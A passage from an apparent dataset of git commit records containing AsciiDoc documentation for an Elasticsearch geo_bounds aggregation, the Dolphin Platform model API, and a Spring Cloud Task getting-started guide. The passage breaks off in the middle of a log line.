{\n \"geo_bounds\" : {\n \"field\" : \"location\" <1>\n \"wrap_longitude\" : \"true\" <2>\n }\n }\n }\n}\n--------------------------------------------------\n\n<1> The `geo_bounds` aggregation specifies the field to use to obtain the bounds\n<2> `wrap_longitude` is an optional parameter which specifies whether the bounding box should be allowed to overlap the international date line. The default value is `true`\n\nThe above aggregation demonstrates how one would compute the bounding box of the location field for all documents with a business type of shop\n\nThe response for the above aggregation:\n\n[source,js]\n--------------------------------------------------\n{\n ...\n\n \"aggregations\": {\n \"viewport\": {\n \"bounds\": {\n \"top_left\": {\n \"lat\": 80.45,\n \"lon\": -160.22\n },\n \"bottom_right\": {\n \"lat\": 40.65,\n \"lon\": 42.57\n }\n }\n }\n }\n}\n--------------------------------------------------\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4516f1c6612ad131c0f78809c85609c36479f032","subject":"java packages in doc","message":"java packages in doc\n","repos":"canoo\/dolphin-platform,canoo\/dolphin-platform,canoo\/dolphin-platform","old_file":"documentation\/dolphin-platform-documentation\/src\/docs\/asciidoc\/model.adoc","new_file":"documentation\/dolphin-platform-documentation\/src\/docs\/asciidoc\/model.adoc","new_contents":"\n= The Model API\n\nOne of the core features and maybe the most important concept of Dolphin Platform is the model synchronization between\nclient and server. For each view in the client a controller instance \"lives\" in the server that defines all the logic of\nthe view. A model is automatically shared and synchronized between the client view and the controller on the server.\n\n.Synchronization of the model\nimage::model-sync.png[]\n\nSuch a model can be a bean or a hierarchy of several beans. Dolphin Platform provides an API to create full observable\nbeans for the model layer.\n\n== Creating a bean\n\nA model for the Dolphin Platform can simply be defined as a Java bean but instead of using primitive date types for all\nthe attributes of the bean Dolphin Platform provides the `Property<V>` interface that should be used to define\nattributes. Based on this a definition for a bean with only one String attribute will look like this:\n\n[source,java]\n----\n@DolphinBean\npublic class MyModel {\n\n private Property<String> value;\n \n public Property<String> valueProperty() {\n return value;\n }\n \n public String getValue() {\n return value.get();\n }\n \n public void setValue(String value) {\n this.value.set(value);\n }\n\n}\n----\n\nNOTE: Maybe you ask yourself why the `@DolphinBean` annotation is needed. Internally the Dolphin Platform checks if a bean\nclass is annotated with `@DolphinBean` and will trow a `BeanDefinitionException` if the annotation is not present. By\ndoing so it will be easy to check if you use the right model classes. We plan to add some additional features based on\nthe annotation in the future. One example can be an annotation processor that checks if all classes that are defined as\nthe Dolphin Platform beans (by adding the `@DolphinBean` annotation) are valid Dolphin Platform beans.\n\n[[supported-types]]\n== Supported types\n\nCurrently Dolphin Platform properties and collections support the following types as content:\n\n* `Integer`\n* `Long`\n* `Float`\n* `Double`\n* `Byte`\n* `Short`\n* `Boolean`\n* `String`\n* `java.util.Date` _(since version 0.8.4)_\n* `java.util.Calendar` _(since version 0.8.4)_\n* `Enums` _(since version 0.8.4)_\n* Dolphin Platform Bean <<bean-hierarchies, (see description)>>\n\nCAUTION: As some browsers have issues with Timezone, one has to use UTC. If the provided Calendar is not set to UTC, it\nwill be converted.\n\nSince version 0.8.8 the Dolphin Platform contains the optional module `dolphin-platform-date-time-converter` that provides\nthe support for addition types for properties and collections. All the types are part of the Java 8 date and time API:\n\n* `java.time.Duration`\n* `java.time.LocalDateTime`\n* `java.time.Period`\n* `java.time.ZonedDateTime`\n\n\nCAUTION: Currently the additional data types are only supported in Java. The support for the JavaScript will be added\nin a future version\n\n=== Custom data types\n\nSince version 0.8.8 the Dolphin Platform provides a SPI to add custom data types for properties and collections. To add\nsupport for a new data type a custom converter must be provided. To do so the `com.canoo.dolphin.converter.ConverterFactory`\ninterface must be implemented and provided for\nhttps:\/\/docs.oracle.com\/javase\/tutorial\/ext\/basics\/spi.html[Java Service Provider Interface (SPI)]. Examples for custom\ndata types can be found in the sources of the optional `dolphin-platform-date-time-converter` module.\n\n== Using collections\n\nThe first example of a Dolphin Platform bean contained only a String property but most of the time you need more complex\nbeans. That's why we added collection support to the Dolphin Platform model API. Next to the properties a bean can contain\nlists that are define by the `ObservableList<V>` interface. The interface extends the default Java `List` interface by adding\nsupport for observers. A Dolphin Platform bean that contains a list might look like this:\n\n[source,java]\n----\n@DolphinBean\npublic class MyModel {\n\n private ObservableList<String> values;\n\n public ObservableList<String> getValues() {\n return values;\n }\n\n}\n----\n\nA `ObservableList<V>` supports <<supported-types, all the same generic types as a property.>>\n\n[[bean-hierarchies]]\n== Defining hierarchies\n\nTODO\n\n== Add observer\n\nTODO\n\n== Defining the model of a MVC group\n\nAs you can see in the following image each MVC group in the Dolphin Platform contains a model. A MVC group is based on the\nMVC pattern and contains a controller, a view and a model. In the Dolphin Platform approach the controller lives on the server\nand the view is defined on the client. The model is shared between the client and the server.\n\n.A MVC group\nimage::model-sync.png[]\n\nAs we have seen until now a model is defined by properties and collections. Since `Property<V>` and `ObservableList<V>` are\ndefined as interfaces and no model provides a specific constructor it's still not clear how a new instance of a model should\ncreated. Thanks to the Dolphin Platform architecture a developer don't need to think about the model instanciation or the\nlifecycle of a model. Whenever a new MVC group is created by the platform the model instance will be created automatically.\nTo do so the model must be defined in the controller. The Dolphin Platform provides the `@DolphinModel` annotation that is\nused to inject the created model instance in the controller instance. The following sample code shows a minimal controller\nthat defines its model type:\n\n----\n@DolphinController\npublic class MyController {\n\n @DolphinModel\n private MyModel model;\n\n}\n----\n\nThe model instance will be automatically synchronized with the client. Since the model is completelly observable you can\n simply bind the properties and lists that are defined in the model to your UI components in the client.\n\n== Working with the BeanManager\n\nTODO\n\n=== Creating new model instances\n\nSince all beans of the Dolphin Platform model layer will be synchronized between client and server a new model instance\ncan not be created \"by hand\" (`MyBean bean = new MyBean`). So instead of creating a new bean instance by calling its\nconstructor the BeanManager interface must be used to create a new bean instance. By doing so the bean instance will\nautomatically be added to the bean manager and synchronized between client and server. Here is an example how a bean\ninstance can be created:\n\n----\nMyBean bean = beanManager.create(MyBean.class);\n----\n\n=== Removing a bean\n\nThe BeanManager interface provides several methods to remove beans. Until a bean is removed by the bean manager it will\nbe synchronized between client and server. Even if a bean isn't referenced in the custom application code anymore it won't\nbe removed by the Java Garbage Collection since it's still referenced by the bean manager. The following methods can be\nused to remove beans from the client-server-synchronization:\n\n* `void remove(Object bean)`\n* `void removeAll(Class<?> beanClass)`\n* `void removeAll(Object... beans)`\n* `void removeAll(Collection<?> beans)`\n\nAll this methods do not work transitive. This means that in a hierarchy of beans all beans must be detached from the\nbean manager seperately.\n\nIn addition the BeanManager interface provides a method to check if a bean is still synchronized between client and\nserver or if it's already removed from the bean manager:\n\n* `boolean isManaged(Object bean)`\n\nCAUTION: Currently all mentioned methods are deprecated. Since the Dolphin Platform provides its own Garbage\nCollector beans can be automatically removed by the bean manager once they are not referenced in the model layer anymore.\nUntil now the Dolphin Platform garbage collection is an experimental feature that must be activated on the server. Once\nthe garbage collection will become a default in the Dolphin Platform the deprecated methods will be removed in a future\nrelease.\n\n== The Dolphin Platform garbage collection\n\nThe Dolphin Platform contains a garbage collection on the server that will automatically remove all bean instances from\nthe remoting layer that aren't referenced anymore by other beans. Currently the garbage collection is an experimental\nfeature and it's not active by default. If you want to use the garbage collection you need to add\n`garbageCollectionActive=true` to the `dolphin.properties` file (see chapter *Server configuration*).\n\n== How to work with the Model API\n\nTo get a better overview of the API that helps you to define presentation models in Dolphin Platform we added a small\nexample.\nLet's say we have the following view that can be part of a photo library app:\n\n.Example Application\nimage::model-example-1.png[]\n\nIn this view, we have several elements that need a data model. If the data of this app is stored on a server the data\nmodel must be shared between the client and the server. When having a look at the screen we can see 3 different elements\nthat need data from the data model to visualize itself or provide user interaction:\n\n* The title of the screen needs a String as its content. We can display the title of a photo album or an internationalized\nstring.\n* The slider that defines a value. Let's imagine that the interaction with the slider changes the size of the pictures in\nthe main area. Maybe the last value of the slider should be stored on the server to automatically save user preferences\n* All pictures in the main area. As you can see each card in this area contains an image and maybe a badge in the top\nright corner. A badge element in the top right corner visualizes if the photo is flagged.\n\nBased on this definition we would create a presentation model that might look like this one:\n\n.The presentation model\nimage::model-example-2.png[]\n\nWhen defining such a model in JavaFX, you can use the cool property API and the observable collections that are part of\nJavaFX. Modern JavaScript frameworks like AngularJS or Polymer provide a similar behavior and therefore we decided to\noffer the same benefits when defining models with the Dolphin Platform. In Dolphin Platform you work with properties and\nobservable collections, too. Therefore it really easy to define a hierarchical model for your view. A model for the\nshown view might look like this:\n\n[source,java]\n----\n@DolphinBean\npublic class PhotoOverviewModel {\n\n private Property<String> title;\n\n private Property<Double> sliderValue;\n\n private ObservableList<PhotoModel> photos;\n\n \/\/getter & setter\n\n}\n\n@DolphinBean\npublic class PhotoModel {\n\n private Property<String> imageUrl;\n\n private Property<Boolean> flagged;\n\n \/\/getter & setter\n\n}\n----\n\nAll properties and collections in the Dolphin Platform are observable and therefore it's quite easy to observe them on\nthe client and the server:\n\n[source,java]\n----\nmyModel.getTitleProperty().onChange(e -> System.out.println(\"New title: \" + e.getNewValue()));\n----\n\nFor all client APIs we support first class support for the Dolphin Platform properties. When working with JavaFX for\nexample it's quite easy and intuitive to bind a synchronized Dolphin Platform property to a JavaFX property:\n\n[source,java]\n----\nFXBinder.bind(booleanJavaFXProperty).bidirectionalTo(booleanDolphinProperty);\n----\n\nOn JavaScript clients the handling is even more elegant as you can bind the Dolphin Platform model directly in HTML.\n\nThe main benefit of this concept is that you can use the same model classes on the server and the client. Because the\nmodel will automatically be synchronized between the view and the server controller it feels like you work with the same\ninstance. By doing so you can simply bind a string property to a textfield in the view and observe it's value on the\nserver. The change events will automatically be fired on the server when you start typing in the textfield.\n\n== Property Binding\n\nThe Dolphin Platform provides an easy way to create a bidirectinal binding between 2 properties of the same generic type.\nCurrently the binding API only supports properties that are defined in the same client session. If you want to sync\nproperties on several clients the event bus is currently the best way to do this.\nTo create a binding between 2 properties in the same client session you need the `PropertyBinder` class. An instance of\nthis class can simply be injected in any controller:\n\n[source,java]\n----\n@DolphinController\npublic class MyController {\n\n @Inject\n private PropertyBinder binder;\n\n}\n----\n\nAll binding are definied by qualifiers that are representated by the `Qualifier` class. For a new binding you need to\ndefine a `Qualifier` instance that defines the generic type of the properties that should be bound. Since you can reuse\nthe `Qualifier` instance for all bindings of that type it's best practice to create a static instance:\n\n[source,java]\n----\npublic interface MyConstants {\n\n public final static Qualifier<String> userNameQualifier = Qualifier<String>.create();\n\n}\n----\n\nOnce you have the `PropertyBinder` instance and the `Qualifier` you can defining bindings. To do so you define the same\nqualifier for all properties that should be bound:\n\n[source,java]\n----\npropertyBinder.bind(model.userNameProperty(), MyConstants.userNameQualifier);\n----\n\nBy using the same qualifier in several controller classes you can simply bind properties in a client scope without doing\nmanual updates.","old_contents":"\n= The Model API\n\nOne of the core features and maybe the most important concept of Dolphin Platform is the model synchronization between\nclient and server. For each view in the client a controller instance \"lives\" in the server that defines all the logic of\nthe view. A model is automatically shared and synchronized between the client view and the controller on the server.\n\n.Synchronization of the model\nimage::model-sync.png[]\n\nSuch a model can be a bean or a hierarchy of several beans. Dolphin Platform provides an API to create full observable\nbeans for the model layer.\n\n== Creating a bean\n\nA model for the Dolphin Platform can simply be defined as a Java bean but instead of using primitive date types for all\nthe attributes of the bean Dolphin Platform provides the `Property<V>` interface that should be used to define\nattributes. Based on this a definition for a bean with only one String attribute will look like this:\n\n[source,java]\n----\n@DolphinBean\npublic class MyModel {\n\n private Property<String> value;\n \n public Property<String> valueProperty() {\n return value;\n }\n \n public String getValue() {\n return value.get();\n }\n \n public void setValue(String value) {\n this.value.set(value);\n }\n\n}\n----\n\nNOTE: Maybe you ask yourself why the `@DolphinBean` annotation is needed. Internally the Dolphin Platform checks if a bean\nclass is annotated with `@DolphinBean` and will trow a `BeanDefinitionException` if the annotation is not present. By\ndoing so it will be easy to check if you use the right model classes. We plan to add some additional features based on\nthe annotation in the future. One example can be an annotation processor that checks if all classes that are defined as\nthe Dolphin Platform beans (by adding the `@DolphinBean` annotation) are valid Dolphin Platform beans.\n\n[[supported-types]]\n== Supported types\n\nCurrently Dolphin Platform properties and collections support the following types as content:\n\n* `Integer`\n* `Long`\n* `Float`\n* `Double`\n* `Byte`\n* `Short`\n* `Boolean`\n* `String`\n* `Date` _(since version 0.8.4)_\n* `Calendar` _(since version 0.8.4)_\n* `Enums` _(since version 0.8.4)_\n* Dolphin Platform Bean <<bean-hierarchies, (see description)>>\n\nCAUTION: As some browsers have issues with Timezone, one has to use UTC. If the provided Calendar is not set to UTC, it\nwill be converted.\n\nSince version 0.8.8 the Dolphin Platform contains the optional module `dolphin-platform-date-time-converter` that provides\nthe support for addition types for properties and collections. All the types are part of the Java 8 date and time API:\n\n* Duration\n* LocalDateTime\n* Period\n* ZonedDateTime\n\n\nCAUTION: Currently the additional data types are only supported in Java. The support for the JavaScript will be added\nin a future version\n\n=== Custom data types\n\nSince version 0.8.8 the Dolphin Platform provides a SPI to add custom data types for properties and collections. To add\nsupport for a new data type a custom converter must be provided. To do so the `com.canoo.dolphin.converter.ConverterFactory`\ninterface must be implemented and provided for\nhttps:\/\/docs.oracle.com\/javase\/tutorial\/ext\/basics\/spi.html[Java Service Provider Interface (SPI)]. Examples for custom\ndata types can be found in the sources of the optional `dolphin-platform-date-time-converter` module.\n\n== Using collections\n\nThe first example of a Dolphin Platform bean contained only a String property but most of the time you need more complex\nbeans. That's why we added collection support to the Dolphin Platform model API. Next to the properties a bean can contain\nlists that are define by the `ObservableList<V>` interface. The interface extends the default Java `List` interface by adding\nsupport for observers. A Dolphin Platform bean that contains a list might look like this:\n\n[source,java]\n----\n@DolphinBean\npublic class MyModel {\n\n private ObservableList<String> values;\n\n public ObservableList<String> getValues() {\n return values;\n }\n\n}\n----\n\nA `ObservableList<V>` supports <<supported-types, all the same generic types as a property.>>\n\n[[bean-hierarchies]]\n== Defining hierarchies\n\nTODO\n\n== Add observer\n\nTODO\n\n== Defining the model of a MVC group\n\nAs you can see in the following image each MVC group in the Dolphin Platform contains a model. A MVC group is based on the\nMVC pattern and contains a controller, a view and a model. In the Dolphin Platform approach the controller lives on the server\nand the view is defined on the client. The model is shared between the client and the server.\n\n.A MVC group\nimage::model-sync.png[]\n\nAs we have seen until now a model is defined by properties and collections. Since `Property<V>` and `ObservableList<V>` are\ndefined as interfaces and no model provides a specific constructor it's still not clear how a new instance of a model should\ncreated. Thanks to the Dolphin Platform architecture a developer don't need to think about the model instanciation or the\nlifecycle of a model. Whenever a new MVC group is created by the platform the model instance will be created automatically.\nTo do so the model must be defined in the controller. The Dolphin Platform provides the `@DolphinModel` annotation that is\nused to inject the created model instance in the controller instance. The following sample code shows a minimal controller\nthat defines its model type:\n\n----\n@DolphinController\npublic class MyController {\n\n @DolphinModel\n private MyModel model;\n\n}\n----\n\nThe model instance will be automatically synchronized with the client. Since the model is completelly observable you can\n simply bind the properties and lists that are defined in the model to your UI components in the client.\n\n== Working with the BeanManager\n\nTODO\n\n=== Creating new model instances\n\nSince all beans of the Dolphin Platform model layer will be synchronized between client and server a new model instance\ncan not be created \"by hand\" (`MyBean bean = new MyBean`). So instead of creating a new bean instance by calling its\nconstructor the BeanManager interface must be used to create a new bean instance. By doing so the bean instance will\nautomatically be added to the bean manager and synchronized between client and server. Here is an example how a bean\ninstance can be created:\n\n----\nMyBean bean = beanManager.create(MyBean.class);\n----\n\n=== Removing a bean\n\nThe BeanManager interface provides several methods to remove beans. Until a bean is removed by the bean manager it will\nbe synchronized between client and server. Even if a bean isn't referenced in the custom application code anymore it won't\nbe removed by the Java Garbage Collection since it's still referenced by the bean manager. The following methods can be\nused to remove beans from the client-server-synchronization:\n\n* `void remove(Object bean)`\n* `void removeAll(Class<?> beanClass)`\n* `void removeAll(Object... beans)`\n* `void removeAll(Collection<?> beans)`\n\nAll this methods do not work transitive. This means that in a hierarchy of beans all beans must be detached from the\nbean manager seperately.\n\nIn addition the BeanManager interface provides a method to check if a bean is still synchronized between client and\nserver or if it's already removed from the bean manager:\n\n* `boolean isManaged(Object bean)`\n\nCAUTION: Currently all mentioned methods are deprecated. Since the Dolphin Platform provides its own Garbage\nCollector beans can be automatically removed by the bean manager once they are not referenced in the model layer anymore.\nUntil now the Dolphin Platform garbage collection is an experimental feature that must be activated on the server. Once\nthe garbage collection will become a default in the Dolphin Platform the deprecated methods will be removed in a future\nrelease.\n\n== The Dolphin Platform garbage collection\n\nThe Dolphin Platform contains a garbage collection on the server that will automatically remove all bean instances from\nthe remoting layer that aren't referenced anymore by other beans. Currently the garbage collection is an experimental\nfeature and it's not active by default. If you want to use the garbage collection you need to add\n`garbageCollectionActive=true` to the `dolphin.properties` file (see chapter *Server configuration*).\n\n== How to work with the Model API\n\nTo get a better overview of the API that helps you to define presentation models in Dolphin Platform we added a small\nexample.\nLet's say we have the following view that can be part of a photo library app:\n\n.Example Application\nimage::model-example-1.png[]\n\nIn this view, we have several elements that need a data model. If the data of this app is stored on a server the data\nmodel must be shared between the client and the server. When having a look at the screen we can see 3 different elements\nthat need data from the data model to visualize itself or provide user interaction:\n\n* The title of the screen needs a String as its content. We can display the title of a photo album or an internationalized\nstring.\n* The slider that defines a value. Let's imagine that the interaction with the slider changes the size of the pictures in\nthe main area. Maybe the last value of the slider should be stored on the server to automatically save user preferences\n* All pictures in the main area. As you can see each card in this area contains an image and maybe a badge in the top\nright corner. A badge element in the top right corner visualizes if the photo is flagged.\n\nBased on this definition we would create a presentation model that might look like this one:\n\n.The presentation model\nimage::model-example-2.png[]\n\nWhen defining such a model in JavaFX, you can use the cool property API and the observable collections that are part of\nJavaFX. Modern JavaScript frameworks like AngularJS or Polymer provide a similar behavior and therefore we decided to\noffer the same benefits when defining models with the Dolphin Platform. In Dolphin Platform you work with properties and\nobservable collections, too. Therefore it really easy to define a hierarchical model for your view. A model for the\nshown view might look like this:\n\n[source,java]\n----\n@DolphinBean\npublic class PhotoOverviewModel {\n\n private Property<String> title;\n\n private Property<Double> sliderValue;\n\n private ObservableList<PhotoModel> photos;\n\n \/\/getter & setter\n\n}\n\n@DolphinBean\npublic class PhotoModel {\n\n private Property<String> imageUrl;\n\n private Property<Boolean> flagged;\n\n \/\/getter & setter\n\n}\n----\n\nAll properties and collections in the Dolphin Platform are observable and therefore it's quite easy to observe them on\nthe client and the server:\n\n[source,java]\n----\nmyModel.getTitleProperty().onChange(e -> System.out.println(\"New title: \" + e.getNewValue()));\n----\n\nFor all client APIs we support first class support for the Dolphin Platform properties. When working with JavaFX for\nexample it's quite easy and intuitive to bind a synchronized Dolphin Platform property to a JavaFX property:\n\n[source,java]\n----\nFXBinder.bind(booleanJavaFXProperty).bidirectionalTo(booleanDolphinProperty);\n----\n\nOn JavaScript clients the handling is even more elegant as you can bind the Dolphin Platform model directly in HTML.\n\nThe main benefit of this concept is that you can use the same model classes on the server and the client. Because the\nmodel will automatically be synchronized between the view and the server controller it feels like you work with the same\ninstance. By doing so you can simply bind a string property to a textfield in the view and observe it's value on the\nserver. The change events will automatically be fired on the server when you start typing in the textfield.\n\n== Property Binding\n\nThe Dolphin Platform provides an easy way to create a bidirectinal binding between 2 properties of the same generic type.\nCurrently the binding API only supports properties that are defined in the same client session. If you want to sync\nproperties on several clients the event bus is currently the best way to do this.\nTo create a binding between 2 properties in the same client session you need the `PropertyBinder` class. An instance of\nthis class can simply be injected in any controller:\n\n[source,java]\n----\n@DolphinController\npublic class MyController {\n\n @Inject\n private PropertyBinder binder;\n\n}\n----\n\nAll binding are definied by qualifiers that are representated by the `Qualifier` class. For a new binding you need to\ndefine a `Qualifier` instance that defines the generic type of the properties that should be bound. Since you can reuse\nthe `Qualifier` instance for all bindings of that type it's best practice to create a static instance:\n\n[source,java]\n----\npublic interface MyConstants {\n\n public final static Qualifier<String> userNameQualifier = Qualifier<String>.create();\n\n}\n----\n\nOnce you have the `PropertyBinder` instance and the `Qualifier` you can defining bindings. To do so you define the same\nqualifier for all properties that should be bound:\n\n[source,java]\n----\npropertyBinder.bind(model.userNameProperty(), MyConstants.userNameQualifier);\n----\n\nBy using the same qualifier in several controller classes you can simply bind properties in a client scope without doing\nmanual updates.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c4324b550d9afbced3b5d6ba6b7d90586e4bdabe","subject":"Docs updated dependency samples to use starter instead of core","message":"Docs updated dependency samples to use starter instead of core\n\nresolves #362\n","repos":"spring-cloud\/spring-cloud-task,mminella\/spring-cloud-task,mminella\/spring-cloud-task,cppwfs\/spring-cloud-task","old_file":"spring-cloud-task-docs\/src\/main\/asciidoc\/getting-started.adoc","new_file":"spring-cloud-task-docs\/src\/main\/asciidoc\/getting-started.adoc","new_contents":"\n[[getting-started]]\n= Getting started\n\n[[partintro]]\n--\nIf you're just getting started with Spring Cloud Task, this is the section\nfor you! Here we answer the basic \"`what?`\", \"`how?`\" and \"`why?`\" questions. You'll\nfind a gentle introduction to Spring Cloud Task. We'll then build our first Spring Cloud\nTask application, discussing some core principles as we go.\n--\n\n[[getting-started-introducing-spring-cloud-task]]\n== Introducing Spring Cloud Task\n\nSpring Cloud Task makes it easy to create short lived microservices. We provide\ncapabilities that allow short lived JVM processes to be executed on demand in a production\nenvironment.\n\n[[getting-started-system-requirements]]\n== System Requirements\n\nYou need Java installed (Java 7 or better, we recommend Java 8) and to build you need to have Maven installed as well.\n\n=== Database Requirements\n\nSpring Cloud Task uses a relational database to store the results of an executed task.\nWhile you can begin developing a task without a database (the status of the task is logged\n as part of the task repository's updates), for production environments, you'll want to\nutilize a supported database. Below is a list of the ones currently supported:\n\n- DB2\n- H2\n- HSQLDB\n- MySql\n- Oracle\n- Postgres\n- SqlServer\n\n[[getting-started-developing-first-task]]\n== Developing your first Spring Cloud Task application\n\nA good place to start is with a simple \"Hello World!\" application so we'll create the\nSpring Cloud Task equivalent to highlight the features of the framework. We'll use Apache\nMaven as a build tool for this project since most IDEs have good support for it.\n\nNOTE: The spring.io web site contains many \u201cGetting Started\u201d guides that use Spring Boot.\nIf you\u2019re looking to solve a specific problem; check there first. You can shortcut the\nsteps below by going to start.spring.io and creating a new project. This will\nautomatically generate a new project structure so that you can start coding right the way.\nCheck the documentation for more details.\n\nBefore we begin, open a terminal to check that you have valid versions of Java and Maven\ninstalled.\n\n[source]\n$ java -version\njava version \"1.8.0_31\"\nJava(TM) SE Runtime Environment (build 1.8.0_31-b13)\nJava HotSpot(TM) 64-Bit Server VM (build 25.31-b07, mixed mode)\n\n[source]\n$ mvn -v\nApache Maven 3.2.3 (33f8c3e1027c3ddde99d3cdebad2656a31e8fdf4; 2014-08-11T15:58:10-05:00)\nMaven home: \/usr\/local\/Cellar\/maven\/3.2.3\/libexec\nJava version: 1.8.0_31, vendor: Oracle Corporation\n\nNOTE: This sample needs to be created in its own folder. Subsequent instructions assume\nyou have created a suitable folder and that it is your \"current directory\".\n\n[[getting-started-creating-the-pom]]\n=== Creating the POM\n\nWe need to start by creating a Maven `pom.xml` file. The `pom.xml` is the recipe that\nwill be used to build your project. Open your favorite text editor and add the following:\n\n[code,xml]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project xmlns=\"http:\/\/maven.apache.org\/POM\/4.0.0\"\n\t\t xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\t xsi:schemaLocation=\"http:\/\/maven.apache.org\/POM\/4.0.0 http:\/\/maven.apache.org\/xsd\/maven-4.0.0.xsd\">\n\n\t<modelVersion>4.0.0<\/modelVersion>\n\n\t<groupId>com.example<\/groupId>\n\t<artifactId>myproject<\/artifactId>\n\t<packaging>jar<\/packaging>\n\t<version>0.0.1-SNAPSHOT<\/version>\n\n\t<parent>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-parent<\/artifactId>\n\t\t<version>1.5.2.RELEASE<\/version>\n\t<\/parent>\n\n\t<properties>\n\t\t<start-class>com.example.SampleTask<\/start-class>\n\t<\/properties>\n\n\t<dependencies>\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter<\/artifactId>\n\t\t<\/dependency>\n\t<\/dependencies>\n\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n<\/project>\n----\n\nThis should give you a working build. You can test it out by running `mvn package` (you\ncan ignore the \"jar will be empty - no content was marked for inclusion!\" warning for\nnow).\n\nNOTE: At this point you could import the project into an IDE (most modern Java IDE's\ninclude built-in support for Maven). For simplicity we will continue to use a plain text\neditor for this example.\n\n[[getting-started-adding-classpath-dependencies]]\n=== Adding classpath dependencies\n\nA Spring Cloud Task is made up of a Spring Boot application that is expected to end. In\nour POM above, we created the shell of a Spring Boot application from a dependency\nperspective by setting our parent to use the `spring-boot-starter-parent`.\n\nSpring Boot provides a number of additional \"Starter POMs\". Some of which are appropriate\nfor use within tasks (`spring-boot-starter-batch`, `spring-boot-starter-jdbc`, etc) and\nsome may not be ('spring-boot-starter-web` is probably not going to be used in a task).\nThe indicator of if a starter makes sense or not comes down to if the resulting\napplication will end (batch based applications typically end, the\n`spring-boot-starter-web` dependency bootstraps a servlet container which probably wont').\n\nFor this example, we'll only need to add a single additional dependency, the one for\nSpring Cloud Task itself:\n\n[source,xml]\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.cloud<\/groupId>\n\t\t\t<artifactId>spring-cloud-starter-task<\/artifactId>\n\t\t\t<version>1.2.3.RELEASE<\/version>\n\t\t<\/dependency>\n\n[[getting-started-writing-the-code]]\n=== Writing the code\n\nTo finish our application, we need to create a single Java file. Maven will compile the\nsources from `src\/main\/java` by default so you need to create that folder structure. Then\nadd a file named `src\/main\/java\/com\/example\/SampleTask.java`:\n\n[source,java]\n----\npackage com.example;\n\nimport org.springframework.boot.*;\nimport org.springframework.boot.autoconfigure.SpringBootApplication;\nimport org.springframework.cloud.task.configuration.EnableTask;\nimport org.springframework.context.annotation.Bean;\n\n@SpringBootApplication\n@EnableTask\npublic class SampleTask {\n\n\t@Bean\n\tpublic CommandLineRunner commandLineRunner() {\n\t\treturn new HelloWorldCommandLineRunner();\n\t}\n\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(SampleTask.class, args);\n\t}\n\n\tpublic static class HelloWorldCommandLineRunner implements CommandLineRunner {\n\n\t\t@Override\n\t\tpublic void run(String... strings) throws Exception {\n\t\t\tSystem.out.println(\"Hello World!\");\n\t\t}\n\t}\n}\n----\n\nWhile it may not look like much, quite a bit is going on. To read more about the Spring\nBoot specifics, take a look at their reference documentation here:\nhttp:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/[http:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/]\n\nWe'll also need to create an `application.properties` in `src\/main\/resources`. We'll\nconfigure two properties in it: the application name (which is translated to the task name)\nand we'll set the logging for spring cloud task to `DEBUG` so that we can see what's going\non:\n\n[source]\n----\nlogging.level.org.springframework.cloud.task=DEBUG\nspring.application.name=helloWorld\n----\n\n[[getting-started-at-task]]\n==== The @EnableTask annotation\n\nThe first non boot annotation in our example is the `@EnableTask` annotation. This class\nlevel annotation tells Spring Cloud Task to bootstrap it's functionality. This occurs by\nimporting an additional configuration class, `SimpleTaskConfiguration` by default. This\nadditional configuration registers the `TaskRepository` and the infrastructure for its\nuse.\n\nOut of the box, the `TaskRepository` will use an in memory `Map` to record the results\nof a task. Obviously this isn't a practical solution for a production environment since\nthe `Map` goes away once the task ends. However, for a quick getting started\nexperience we use this as a default as well as echoing to the logs what is being updated\nin that repository. Later in this documentation we'll cover how to customize the\nconfiguration of the pieces provided by Spring Cloud Task.\n\nWhen our sample application is run, Spring Boot will launch our\n`HelloWorldCommandLineRunner` outputting our \"Hello World!\" message to standard out. The\n`TaskLifecyceListener` will record the start of the task and the end of the task in the\nrepository.\n\n[[getting-started-main-method]]\n==== The main method\n\nThe main method serves as the entry point to any java application. Our main method\ndelegates to Spring Boot's `SpringApplication` class. You can read more about it in the\nSpring Boot documentation.\n\n[[getting-started-clr]]\n==== The CommandLineRunner\n\nIn Spring, there are many ways to bootstrap an application's logic. Spring Boot provides\na convenient method of doing so in an organized manner via their `*Runner` interfaces\n(`CommandLineRunner` or `ApplicationRunner`). A well behaved task will bootstrap any\nlogic via one of these two runners.\n\nThe lifecycle of a task is considered from before the `*Runner#run` methods are executed\nto once they are all complete. Spring Boot allows an application to use multiple\n`*Runner` implementation and Spring Cloud Task doesn't attempt to impede on this convention.\n\nNOTE: Any processing bootstrapped from mechanisms other than a `CommandLineRunner` or\n`ApplicationRunner` (using `InitializingBean#afterPropertiesSet` for example) will not be\n recorded by Spring Cloud Task.\n\n[[getting-started-running-the-example]]\n=== Running the example\n\nAt this point, your application should work. Since this application is Spring Boot based,\n we can run it from the command line via the command `$ mvn spring-boot:run` from the root\n of our applicaiton:\n\n[source]\n----\n$ mvn clean spring-boot:run\n....... . . .\n....... . . . (Maven log output here)\n....... . . .\n\n\n . ____ _ __ _ _\n \/\\\\ \/ ___'_ __ _ _(_)_ __ __ _ \\ \\ \\ \\\n( ( )\\___ | '_ | '_| | '_ \\\/ _` | \\ \\ \\ \\\n \\\\\/ ___)| |_)| | | | | || (_| | ) ) ) )\n ' |____| .__|_| |_|_| |_\\__, | \/ \/ \/ \/\n =========|_|==============|___\/=\/_\/_\/_\/\n :: Spring Boot :: (v1.3.3.RELEASE)\n\n2016-01-25 11:08:10.183 INFO 12943 --- [ main] com.example.SampleTask : Starting SampleTask on Michaels-MacBook-Pro-2.local with PID 12943 (\/Users\/mminella\/Documents\/IntelliJWorkspace\/spring-cloud-task-example\/target\/classes started by mminella in 